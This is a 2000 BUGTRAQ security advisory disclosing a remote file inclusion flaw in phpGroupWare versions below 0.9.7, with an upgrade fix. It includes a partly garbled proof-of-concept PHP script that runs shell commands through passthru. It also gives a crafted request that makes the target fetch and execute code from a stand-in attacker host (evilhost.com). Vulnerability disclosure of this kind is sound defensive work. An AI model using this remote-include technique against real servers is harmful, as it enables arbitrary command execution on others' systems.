From create@SECUREREALITY.COM.AU Wed Dec 6 15:41:24 2000 From: Secure Reality Advisories To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 6 Dec 2000 23:00:44 +1100 Subject: [BUGTRAQ] (SRADV00006) Remote command execution vulnerabilities in phpGroupWare [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] ================================================= Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006) http://www.securereality.com.au ================================================= [Title] Remote command execution vulnerabilities in phpGroupWare [Released] 6/11/2000 [Vulnerable] Versions below 0.9.7 under Unix [Overview] phpGroupWare is a multi-user web based groupware suite written in PHP. phpGroupWare is quite popular due to its integration of many aspects of group cooperation: email, calendaring, file sharing, to do lists, etc. phpGroupWare makes insecure calls to the include() function of PHP which can allow the inclusion of remote files, and thereby the execution of arbitrary commands on the remote web server with the permissions of the web server user, usually 'nobody' [Impact] Remote command execution (with privileges as above) [Detail] This is an excellent example of another aspect of the remotely accessible include files issue that has been discussed in detail recently. The discussion has centered around the sensitive information that can be contained in include files and the fact that include files generally have the extension 'inc' and thus, if web accessible, are returned to the requestor in plain text. A common solution amongst freely available php scripts is to give include files the extension .inc.php. This causes the include file to always be processed by the PHP interpreter and therefore not return in plain text sensitive configuration information, like database passwords. Thus these programs can have easy installation (untar everything into the web space) without worrying about configuration disclosure. The problem however then becomes one of context. Code and configuration variables in include files tend to be highly interdependent, that is, certain files and data must have already been included before including a particular file. By directly requesting the files we can break the interdependence chain and cause data the include files could normally trust to become untrustworthy. Which leads us to the phpGroupWare vulnerability. We can directly request the library include files that make up the phpGroupWare API, one of these files, phpgw.inc.php performs an include based on variables that should have been set as part of the call chain. By providing them ourselves we can determine the initial part of the following include statement: include($phpgw_info["server"]["include_root"] . "/phpgwapi/phpgw_info.inc.php"); By providing $phpgw_info[server][include_root] as a form variable that points to a remote web server on which we can place files, we can get the script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute it. For example, if I had access to place files in a webspace http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place inside it a script called phpgw_info.inc.php with content like the following: "); passthru("id"); '; // If we were called via remote include, send the code to be // executed if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP") echo(""); else // Otherwise we're being executed on the target web server already, // so simply evaluate the code eval($phpcode); exit(); ?> (This script is designed so that the server it is placed on can be PHP enabled and not result in the code being executed on the attacking machine) If we then make a request to the target machine like the following: /phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=ht tp://evilhost.com/~shaun The code should be retrieved and executed. It should be noted there are some caveats to this attack: - The remote web server must be able to retrieve the file, i.e no firewalls in the way - The remote web server must not be running PHP under Windows since remote file includes are not supported on this platform - The remote web server must be running a sufficiently recent version of PHP that [][] form variables are allowed - The remote web server must not have allow_url_fopen set off - Later versions of phpGroupWare check the variable $phpgw_info["server"]["header_version"] in phpgw.inc.php, for those versions we need to provide that via form variables too There may well be others based on other versions/configurations of PHP. [Fix] Please upgrade to the latest version of phpGroupWare (0.9.7) at http://sourceforge.net/project/showfiles.php?group_id=7305 [Acknowledgements] Our thanks to all of the developers of phpGroupWare, in particular Dan Kuykendall, for their assistance in quickly correcting this issue. [Disclaimer] Advice, directions and instructions on security vulnerabilities in this advisory do not constitute: an endorsement of illegal behavior; a guarantee that protection measures will work; an endorsement of any product or solution or recommendations on behalf of Secure Reality Pty Ltd. Content is provided as is and Secure Reality Pty Ltd does not accept responsibility for any damage or injury caused as a result of its use.